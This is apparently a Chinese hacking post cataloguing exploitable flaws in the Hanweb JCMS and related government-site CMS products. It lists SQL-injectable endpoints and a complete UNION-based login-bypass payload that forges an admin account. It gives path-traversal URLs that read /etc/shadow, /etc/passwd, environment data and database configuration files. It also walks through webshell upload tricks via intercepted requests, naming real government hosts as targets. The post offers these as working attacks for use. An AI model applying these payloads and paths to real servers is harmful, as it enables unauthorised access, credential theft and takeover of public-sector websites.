整理一些大汉版通的漏洞

摘要

1.sql注入/vc/vc/interface/index/que_scount.jsp?webid=1/jcms/short_message/que_contact.jsp?vc_searchname=1
/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a
/jcms/workflow/design/que_model.jsp?userid=
/jcms/workflow/objectbox/selectx_search.jsp?spell=1
/jcms/workflow/objectbox/selectx_list.jsp?id=1
/jcms/workflow/objectbox/selectx_search.jsp?spell=jcms
/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a
/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=aaa
/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1
/jcms/m_5_5/m_5_5_1/que_flow.jsp?que_keywords1=aaa
/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1
/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&nodecode=3&handlerid=4&flowcode=2
/jcms/m_5_e/module/messagebook/opr_messagebook_column.jsp?fn_billstatus=D&i_ID=1
/jcms/m_5_e/init/download/downfile.jsp?filename=1

1.sql注入

/vc/vc/interface/index/que_scount.jsp?webid=1

/jcms/short_message/que_contact.jsp?vc_searchname=1
/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a
/jcms/workflow/design/que_model.jsp?userid=
/jcms/workflow/objectbox/selectx_search.jsp?spell=1
/jcms/workflow/objectbox/selectx_list.jsp?id=1
/jcms/workflow/objectbox/selectx_search.jsp?spell=jcms
/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a
/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=aaa
/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1
/jcms/m_5_5/m_5_5_1/que_flow.jsp?que_keywords1=aaa
/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1
/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&nodecode=3&handlerid=4&flowcode=2
/jcms/m_5_e/module/messagebook/opr_messagebook_column.jsp?fn_billstatus=D&i_ID=1
/jcms/m_5_e/init/download/downfile.jsp?filename=1

/jsearch/objectbox/selectx_search.jsp?spell=jsearch

/jphoto/objectbox/selectx_search.jsp?spell=1

/jis/objectbox/selx_userlist.jsp?fn_Keywords=1
/jis/objectbox/selx_search.jsp?spell=jis
/jis/objectbox/selx_list.jsp?id=1
/jis/manage/datasbase/closeup.jsp?id=1
/jis/manage/datasbase/startup.jsp?id=1

/xxgk/workflow/objectbox/selectx_list.jsp?id=1
/xxgk/workflow//statistics/que_apply_sta.jsp?userid=0&modelname=1&modelname1=2
/xxgk/short_message/que_recemsg.jsp?que_keywords=1&loginid=1&boxtype=1&que_keywords1=1&que_startdate=1&que_enddate=1
/module/sitesearch/index.jsp?columnid=81
/module/rss/rssfeed.jsp?colid=23

/vipchat/home/front/search/opr_chatsearch.jsp?action=simplesearch&keywords=

/zfxxgk/serviceobjectinfo.jsp?servicebm=
/zfxxgk/subjectinfo.jsp?subjectbm=

1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。
2. 利用测试：
后台登录页:http://www.target.com/jcms/
用户名：
[php]x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--[/php]
密码:1
其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码，解密后为'1';后面的'1'表示帐号启用。

2.任意文件读取
/xxgk/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=....//....//zfxxgk/subjectstyle.xml&webid=52&type=41&downname=a.txt

/jcms/jcms_files/jcms1/web1/site/module/oss/downfile.jsp?filename=a.txt&pathfile=media/-1/....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//proc/self/environ

/vc/vc/columncount/tem/downfile.jsp?filename=/etc/passwd&savename=down.txt

/jcms/m_5_7/replace/export.jsp?filename=/etc/shadow&savename=pass

/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini

/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/web.xml

/jis/down.jsp?pathfile=web-inf/config/dbconfig.xml

/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig

3.上传getshell漏洞
太多，无法一一列举
1.jcms
将如下代码保存为htm
[php]

[/php]
Path : /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+uploadname

打开便可直接上传任意的文件，文件上传后，路径为：
[php]
/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+你上传的文件名[/php]

2.vc
于是我们构造以下Exp 便可直接获取shell
[php]

[/php]

保存为htm 便可直接上传任意文件，
构造zip压缩包，images 文件夹中为我们的shell,default.html 中包含 、
解压的路径为：/vc/vc/html/upload/shell/images/文件名
3.jcms
jcms/setup/opr_upload.jsp
该功能为导入一个zip后缀的更新包...最后会将马解压到目录中update中
/jcms/update

4.xxgk
http://xxgk.lyg.gov.cn//xxgk/m_5_e/module/review/opr_review_template.jsp
打开此页面后，直接上传我们的shell.zip，点击提交即可在服务器上解压并生成Customize.jsp
/xxgk/jcms_files/jcms1/web0/site/zfxxgk/letterbox/template/-1/Customize.jsp
注：经过多个测试，一般情况都为此路径，极少部分 有可能会更改jcms1 web0后面的数字

5./xxgk/m_6_1/opr_modal.jsp
step1 将我们要上传的users.jsp重命名为user.htm
step2 上传时抓包，将user.htm再次命名为user.jsp即可
点击GO 即可在下面目录生成user.jsp

/xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/你的文件名

注意：由于代码中上传文件的路径为：
"/jcms_files/jcms" + strAppID + "/web" + nWebID+ "/site/zfxxgk/ysqgk/modal/" + strModaltype + "/"+ 文件名;
所以路径可能要做适当的更改.@@@
http://xxgk.site.cn/xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/users.jsp

6./xxgk/m_5_7/replace/opr_importinfo.jsp
First:首先将我们要上传的文件改名为shell.xml,之后抓包再改回来..
在验证之前简单说下比较有意思的地方,当我们点击上传的时候，采用Burp suite抓包修改，提交即可
有两处需要修改的地方：

Content-Disposition: form-data; name="file1"; filename="shell.xml"
Content-Disposition: form-data; name="file3"; filename="shell.jsp"

注意：name必须修改为非file1，要不然无法成功上传（这里就是我觉得比较有意思的地方）

提交后会就会在 /m_5_7/replace/temp/ 目录下生成shell.jsp

http://xxgk.weifang.gov.cn/xxgk/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1

7./xxgk/m_5_5/m_5_5_3/import_style.jsp

我们将xiao.jspx 改名为xiao.xml 上传..
提交后抓包修改文件名为1.jspx即可

此时已经在 /m_5_5/m_5_5_3/temp/upload/ 目录下生成了xiao.jspx 访问下 成功
/xxgk//m_5_5/m_5_5_3/temp/upload/xiao.jspx

8.截断上传
[php]

[/php]

[php]

[/php]